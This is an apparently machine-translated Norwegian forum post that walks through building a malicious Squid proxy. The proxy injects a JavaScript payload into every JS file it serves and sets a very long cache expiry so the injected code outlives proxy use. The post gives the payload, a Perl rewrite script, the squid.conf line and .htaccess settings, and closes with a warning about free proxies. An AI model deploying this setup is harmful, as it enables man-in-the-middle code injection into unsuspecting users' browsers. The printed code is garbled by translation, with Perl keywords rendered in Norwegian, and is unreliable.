Dette innlegget ble sist redigert av Mo Xiaowen 7.6.2015 23:19
Dette kan gjøres ved ganske enkelt å endre konfigurasjonen til SQUID
Hva er SQUID?
Squid er en programvare som bufrer Internett-data, mottar nedlastingsforespørsler fra brukere, og automatisk behandler de nedlastede dataene. Når en bruker ønsker å laste ned en hjemmeside, kan han sende en forespørsel til Squid, be Squid laste den ned på hans vegne, deretter kobler Squid seg til nettsiden og ber om hjemmesiden, og sender deretter hjemmesiden til brukeren mens han beholder en sikkerhetskopi. Når andre brukere søker om samme side, sender Squid umiddelbart den lagrede sikkerhetskopien til brukeren, slik at brukeren føler at hastigheten er ganske rask. Squid kan proxy-protokoller som HTTP, FTP, GOPHER, SSL og WAIS, og Squid kan håndtere det automatisk, og du kan sette opp Squid etter dine behov for å filtrere ut uønskede ting.
Squid kan fungere i mange operativsystemer, som AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, osv.
Implementeringen er veldig enkel:
1. Installer Squid på én Linux-server.
2. Endre serverens kode, sette inn en del av koden vår i all sendt javascrip og send den ut.
3. Sett cache-tiden for vår modifiserte js-fil så høyt som mulig.
Denne metoden gjelder også for nettsteder med SSL aktivert; hvis nettsiden laster inn en usikker ressurs (som jquery for et HTTP-nettsted), vil de fleste nettlesere gi en advarsel, men få følger med.
Chema sa at mer enn 5 000 personer brukte proxyen hans noen dager etter at han slapp den, og de fleste brukte den til å gjøre dårlige ting, fordi de brukte proxyen, så de trodde den var anonym og trygg, men de forventet aldri at proxyserveren også skulle gjøre dårlige ting.
Lag din ondsinnede proxy-server
Hvis du allerede har en Squid-proxyserver, trenger du også en webserver som Apache.
Trinn 1: Opprett en nyttelast
Jeg bruker et enkelt skript som demonstrasjon for å peke alle hyperkoblingene til nettsiden min.
/etc/squid/payload.js
[mw_shl_code=javascrip fjern t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Trinn 2: Skriv et skript som infiserer alle JS-filer
/etc/squid/poison.pl
[mw_shl_code=perl, sant]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
mens (<>)
{
chomp $_;
hvis($_ =- /(.*.js)/i)
{
$url = $1;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("katt /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
trykk "http://127.0.0.1:80/tmp/$pid-$count.js";
}
ellers
{
trykk "$_";
}
$count++;
}[/mw_shl_code]
Dette skriptet bruker wget for å hente den originale javascrip fra siden og fjerne t-filen, deretter legge til koden i /etc/squid/payload.js og sende den modifiserte filen til klienten, mens du må opprette /var/www/tmp-mappen og la squid skrive filer i den. Denne katalogen lagrer de modifiserte js-filene.
Trinn 3: Kombiner skriptet ovenfor med Squid
Legg det til i /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Steg 4: Få cachen til aldri å feile
/var/www/tmp/.htaccess
[mw_shl_code=html,sant] Utløpsaktiv på
UtløperDefault "tilgang pluss 3000 dager"[/mw_shl_code]
Dette vil fortelle Apache å gi ham lang utløpstid til brukeren har ryddet opp i cachen sin.
Hvis du kobler til denne proxyen, vil et klikk på en hvilken som helst hyperkobling omdirigere deg til nettsiden min, og cachen vil fortsatt eksistere selv om du ikke bruker proxyen senere. Jeg brukte bare en ikke-aggressiv nyttelast, og med denne metoden kan hackere gjøre mye mer. Så minn deg selv og vennene dine på å være forsiktige med å bruke gratis proxyer.
|
Publisert på 19.01.2015 02:34:56
|
|
|
|
Publisert på 19.01.2015 08:48:45
|
Vert|
Publisert på 20.01.2015 14:36:06
|
